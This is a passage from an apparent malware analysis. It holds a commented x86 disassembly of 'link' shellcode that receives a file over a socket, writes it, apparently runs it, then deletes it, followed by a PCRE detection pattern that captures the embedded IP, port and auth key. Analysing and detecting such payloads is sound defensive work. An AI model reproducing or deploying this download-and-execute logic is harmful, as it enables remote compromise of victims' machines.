je link-03.004023ff ; errorhandling 00402372 8b7d 0c mov edi,dword ptr ss:[ebp+c] 00402375 33c0 xor eax,eax 00402377 50 push eax 00402378 b4 02 mov ah,2 0040237a 50 push eax 0040237b ff75 14 push dword ptr ss:[ebp+14] 0040237e ff75 04 push dword ptr ss:[ebp+4] 00402381 ba 005860e2 mov edx,e2605800 00402386 ffd6 call esi ; recv() 00402388 8b7d 08 mov edi,dword ptr ss:[ebp+8] 0040238b 85c0 test eax,eax 0040238d 74 1e je short link-03.004023ad ; u! 0040238f 8bc8 mov ecx,eax 00402391 41 inc ecx 00402392 74 57 je short link-03.004023eb ; errorhandling 00402394 53 push ebx 00402395 8d4d 10 lea ecx,dword ptr ss:[ebp+10] 00402398 51 push ecx 00402399 50 push eax 0040239a ff75 14 push dword ptr ss:[ebp+14] 0040239d ff75 1c push dword ptr ss:[ebp+1c] 004023a0 ba b9bef5cb mov edx,cbf5beb9 004023a5 ffd6 call esi 004023a7 85c0 test eax,eax 004023a9 74 40 je short link-03.004023eb 004023ab ^eb c5 jmp short link-03.00402372 004023ad ff75 1c push dword ptr ss:[ebp+1c] 004023b0 ba 5c93c59d mov edx,9dc5935c 004023b5 ffd6 call esi 004023b7 6a 44 push 44 004023b9 58 pop eax 004023ba 2be0 sub esp,eax 004023bc 8bfc mov edi,esp 004023be 8bd7 mov edx,edi 004023c0 ab stos dword ptr es:[edi] 004023c1 33c0 xor eax,eax 004023c3 6a 10 push 10 004023c5 59 pop ecx 004023c6 ab stos dword ptr es:[edi] 004023c7 ^e2 fd loopd short link-03.004023c6 004023c9 8b7d 08 mov edi,dword ptr ss:[ebp+8] 004023cc 52 push edx 004023cd 52 push edx 004023ce 50 push eax 004023cf 50 push eax 004023d0 50 push eax 004023d1 50 push eax 004023d2 50 push eax 004023d3 50 push eax 004023d4 50 push eax 004023d5 ff75 18 push dword ptr ss:[ebp+18] 004023d8 ba 2cf19426 mov edx,2694f12c 004023dd ffd6 call esi 004023df 58 pop eax 004023e0 fec7 inc bh 004023e2 53 push ebx 004023e3 50 push eax 004023e4 ba 01d634de mov edx,de34d601 004023e9 ffd6 call esi 004023eb ff75 1c push dword ptr ss:[ebp+1c] 004023ee ba 5c93c59d mov edx,9dc5935c 004023f3 ffd6 call esi ; closehandle() 004023f5 ff75 18 push dword ptr ss:[ebp+18] 004023f8 ba 3d53cf27 mov edx,27cf533d 004023fd ffd6 call esi ; deletefilea() 004023ff 8b7d 0c mov edi,dword ptr ss:[ebp+c] ; --- error handling 00402402 ff75 04 push dword ptr ss:[ebp+4] 00402405 ba 85563107 mov edx,7315685 0040240a ffd6 call esi ; closesocket() 0040240c 8b7d 08 mov edi,dword ptr ss:[ebp+8] 0040240f ba ba460cc1 mov edx,c10c46ba 00402414 ffd6 call esi ; exitthread()
const char *linkPCRE = ".*\\x53\\x53\\x68(....)\\x68\\x02\\x00(..)\\x8B\\xD4\\x8B\\xD8\\x6A" // ^^^^->ip ^^-> port "\\x10\\x52\\x53\\xBA\\x63\\x30\\x60\\x5A\\xFF\\xD6\\x50\\xB4\\x02\\x50\\x55\\x53\\xBA" "\\x00\\x58\\x60\\xE2\\xFF\\xD6\\xBF(....)\\xFF\\xE5.*"; // ^^^^-> auth key
